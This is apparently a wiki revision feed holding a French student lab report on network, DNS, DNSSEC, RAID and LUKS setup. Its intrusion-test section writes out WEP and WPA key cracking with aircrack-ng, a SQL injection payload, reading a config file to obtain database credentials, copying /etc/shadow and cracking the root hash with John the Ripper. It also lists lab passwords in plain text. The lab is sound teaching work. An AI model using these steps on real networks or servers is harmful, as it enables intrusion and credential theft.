 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 //allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @       IN      SOA     (&lt;br /&gt;
                        ns.anosteke.site.&lt;br /&gt;
                        ns6.gandi.net.&lt;br /&gt;
                        2;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        )&lt;br /&gt;
&lt;br /&gt;
         IN      NS      ns6.gandi.net. &lt;br /&gt;
 www     IN      A       193.48.57.182&lt;br /&gt;
 ns      IN      CNAME   www&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
 nslookup anosteke59.site &lt;br /&gt;
 dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de site par certificat ===&lt;br /&gt;
On crée une demande de certificat avec la commande : &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. &lt;br /&gt;
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
On ajoute à notre fichier named.conf.options les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
 dnssec-enable yes; //Activer le dnssec, même si déprécié sur notre version&lt;br /&gt;
 dnssec-validation yes; //FOrcer le dnssec&lt;br /&gt;
&lt;br /&gt;
On génère ensuite nos clés, dans un fichier connus&lt;br /&gt;
&lt;br /&gt;
 cd /etc/bind/master&lt;br /&gt;
 dnssec-keygen -a NSEC3RSASHA1 -b 2048 -n ZONE anosteke59.site &lt;br /&gt;
 //Kanosteke59.site.+007+15849&lt;br /&gt;
 dnssec-keygen -f KSK -a NSEC3RSASHA1 -b 4096 -n ZONE anosteke59.site&lt;br /&gt;
 //Kanosteke59.site.+007+60636&lt;br /&gt;
&lt;br /&gt;
ici on crée une clé pour du SHA-1&lt;br /&gt;
ON peut ensuite renommer les fichiers &lt;br /&gt;
 &lt;br /&gt;
 mv Kanosteke59.site.+007+60636.key  Kanosteke59.site.ksk.key&lt;br /&gt;
 mv Kanosteke59.site.+007+60636.private  Kanosteke59.site.ksk.private&lt;br /&gt;
 mv Kanosteke59.site.+007+15849.key  Kanosteke59.site.zsk.key&lt;br /&gt;
 mv Kanosteke59.site.+007+15849.private  Kanosteke59.site.zsk.private&lt;br /&gt;
&lt;br /&gt;
On ajoute dans la fin de définition du domaine :&lt;br /&gt;
&lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 &lt;br /&gt;
 ...&lt;br /&gt;
 &lt;br /&gt;
 $INCLUDE Kanosteke59.site.zsk.key&lt;br /&gt;
 $INCLUDE Kanosteke59.site.ksk.key&lt;br /&gt;
&lt;br /&gt;
On signe maintenant nos fichier de définition&lt;br /&gt;
 dnssec-signzone -o anosteke59.site  -k Kanosteke59.site.ksk anosteke59.site Kanosteke59.site.zsk&lt;br /&gt;
&lt;br /&gt;
On modifie ensuite notre fichier '/etc/bind/named.conf.options' pour pointer sur ce nouveau fichier signé&lt;br /&gt;
 zone &amp;quot;anosteke59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/master/anosteke59.site.signed&amp;quot;;&lt;br /&gt;
         notify yes;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
j'ai vérifié la config final avec : https://dnssec-analyzer.verisignlabs.com/anosteke59.site&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
Après un rédémarrage de la VM on execute &lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :&lt;br /&gt;
&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
&lt;br /&gt;
et on valide les modifications:&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Pour démarrer, nous formatons la clé :&lt;br /&gt;
 mkfs.ext4 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
A l'aide de ''cryptsetup'', nous initialisons la clé USB avec l'option luksFormat et choisissons un mot de passe :&lt;br /&gt;
 cryptsetup luksFormat /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous ouvrons ensuite notre partition chiffrée et créons le nom du volume : crypte &lt;br /&gt;
 cryptsetup luksOpen /dev/sdb crypte&lt;br /&gt;
Puis nous le formatons&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypte &lt;br /&gt;
&lt;br /&gt;
Nous montons ensuite la partition afin d'y ajouter un fichier test :&lt;br /&gt;
 mkdir /mnt/cryptUSB&lt;br /&gt;
 mount -t ext4 /dev/mapper/crypte /mnt/cryptUSB/&lt;br /&gt;
&lt;br /&gt;
Nous créons ce fichier test.txt en y inscrivant &amp;quot;BONJOUR MONDE !&amp;quot; :&lt;br /&gt;
 nano /mnt/cryptUSB/test.txt&lt;br /&gt;
&lt;br /&gt;
Enfin, nous démontons et fermons le volume chiffré :&lt;br /&gt;
 umount /mnt/cryptUSB&lt;br /&gt;
 cryptsetup luksClose crypte&lt;br /&gt;
&lt;br /&gt;
Afin de vérifier le cryptage de la clé, nous le mettons sur un autre PC. On se rend compte que le mot de passe est obligatoire pour accéder aux fichiers&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== WEP ===&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44&lt;br /&gt;
&lt;br /&gt;
=== WPA ===&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous réalisons une injection sql afin de récupérer la liste de tous les utilisateurs du site honey.plil.info. Nous choisissons comme utilisateur &amp;quot;' or 1=1; --&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Nous nous connectons avec le compte administrateur. Dans un des fichiers, nous trouvons des allusions à PHPMyAdmin.&lt;br /&gt;
De là, 3 menus, dont 2 sont intéressants. Dans l'onglet ''gestion des manuels'', on peut ajouter un fichier depuis le serveur.&amp;lt;br/&amp;gt;&lt;br /&gt;
Ainsi, nous avons ajouté le fichier /etc/phpmyadmin/config-db.php.&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Depuis la page ''Recherche d'un manuel'', nous avons pû télécharger ce fichier, qui nous a indiqué le mot de passe du compte phpmyadmin : '''gencovid19'''.&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
2. PHPMyAdmin&lt;br /&gt;
&lt;br /&gt;
Nous avons donc ouvert l'URL http://honey.plil.info/phpmyadmin dans un navigateur, et nous nous connectons avec le compte root:gencovid19&lt;br /&gt;
Dans PHPMyAdmin, nous trouvons un DB test avec des identifiants : rex:plainpassword &lt;br /&gt;
&lt;br /&gt;
3. Récupération de fichiers avec l'user rex&lt;br /&gt;
&lt;br /&gt;
Nous avons donc réussi à nous connecter en SSH au serveur, et nous avons récupéré les fichiers /etc/passwd et /etc/shadow.&amp;lt;br/&amp;gt;&lt;br /&gt;
Nous avons lancé la commande :&lt;br /&gt;
 unshadow /etc/passwd /etc/shadow | head -1 &amp;gt; mdp&lt;br /&gt;
Nous avons obtenu un fichier avec le mot de passe root haché.&lt;br /&gt;
&lt;br /&gt;
5. Decryptage du mot de passe root avec John the Ripper&lt;br /&gt;
&lt;br /&gt;
Pour casser le mot de passe, nous avons utilisé John the Ripper. Nous nous sommes aidé des indications : &amp;quot;mot de passe présentant les mêmes caractéristiques que le mot de passe root habituel&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Nous avons créé un dictionnaire de mots de 4 lettres : &lt;br /&gt;
 crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dict&lt;br /&gt;
&lt;br /&gt;
Pour obtenir des mots de 8 lettres (en duplicant les mots de 4 lettres), nous avons utilisé sed : &lt;br /&gt;
 sed -i 's/\(.*\)/\1\1/'&lt;br /&gt;
La dernière étape consistait à lancer JtR :&lt;br /&gt;
 john -w:dict mdp&lt;br /&gt;
Après 5 minutes d'attente, le mot de passe vu cracké.&amp;lt;br/&amp;gt;&lt;br /&gt;
Avec la commande : &lt;br /&gt;
 john --show mdp&lt;br /&gt;
On obtient le mot de passe : '''fortfort'''.&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57781</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57781"/>
				<updated>2022-01-10T17:39:24Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* Intrusion serveur WEB */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 //allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @       IN      SOA     (&lt;br /&gt;
                        ns.anosteke.site.&lt;br /&gt;
                        ns6.gandi.net.&lt;br /&gt;
                        2;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        )&lt;br /&gt;
&lt;br /&gt;
         IN      NS      ns6.gandi.net. &lt;br /&gt;
 www     IN      A       193.48.57.182&lt;br /&gt;
 ns      IN      CNAME   www&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
 nslookup anosteke59.site &lt;br /&gt;
 dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de site par certificat ===&lt;br /&gt;
On crée une demande de certificat avec la commande : &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. &lt;br /&gt;
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
On ajoute à notre fichier named.conf.options les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
 dnssec-enable yes; //Activer le dnssec, même si déprécié sur notre version&lt;br /&gt;
 dnssec-validation yes; //FOrcer le dnssec&lt;br /&gt;
&lt;br /&gt;
On génère ensuite nos clés, dans un fichier connus&lt;br /&gt;
&lt;br /&gt;
 cd /etc/bind/master&lt;br /&gt;
 dnssec-keygen -a NSEC3RSASHA1 -b 2048 -n ZONE anosteke59.site &lt;br /&gt;
 //Kanosteke59.site.+007+15849&lt;br /&gt;
 dnssec-keygen -f KSK -a NSEC3RSASHA1 -b 4096 -n ZONE anosteke59.site&lt;br /&gt;
 //Kanosteke59.site.+007+60636&lt;br /&gt;
&lt;br /&gt;
ici on crée une clé pour du SHA-1&lt;br /&gt;
ON peut ensuite renommer les fichiers &lt;br /&gt;
 &lt;br /&gt;
 mv Kanosteke59.site.+007+60636.key  Kanosteke59.site.ksk.key&lt;br /&gt;
 mv Kanosteke59.site.+007+60636.private  Kanosteke59.site.ksk.private&lt;br /&gt;
 mv Kanosteke59.site.+007+15849.key  Kanosteke59.site.zsk.key&lt;br /&gt;
 mv Kanosteke59.site.+007+15849.private  Kanosteke59.site.zsk.private&lt;br /&gt;
&lt;br /&gt;
On ajoute dans la fin de définition du domaine :&lt;br /&gt;
&lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 &lt;br /&gt;
 ...&lt;br /&gt;
 &lt;br /&gt;
 $INCLUDE Kanosteke59.site.zsk.key&lt;br /&gt;
 $INCLUDE Kanosteke59.site.ksk.key&lt;br /&gt;
&lt;br /&gt;
On signe maintenant nos fichier de définition&lt;br /&gt;
 dnssec-signzone -o anosteke59.site  -k Kanosteke59.site.ksk anosteke59.site Kanosteke59.site.zsk&lt;br /&gt;
&lt;br /&gt;
On modifie ensuite notre fichier '/etc/bind/named.conf.options' pour pointer sur ce nouveau fichier signé&lt;br /&gt;
 zone &amp;quot;anosteke59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/master/anosteke59.site.signed&amp;quot;;&lt;br /&gt;
         notify yes;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
j'ai vérifié la config final avec : https://dnssec-analyzer.verisignlabs.com/anosteke59.site&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
Après un rédémarrage de la VM on execute &lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :&lt;br /&gt;
&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
&lt;br /&gt;
et on valide les modifications:&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Pour démarrer, nous formatons la clé :&lt;br /&gt;
 mkfs.ext4 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
A l'aide de ''cryptsetup'', nous initialisons la clé USB avec l'option luksFormat et choisissons un mot de passe :&lt;br /&gt;
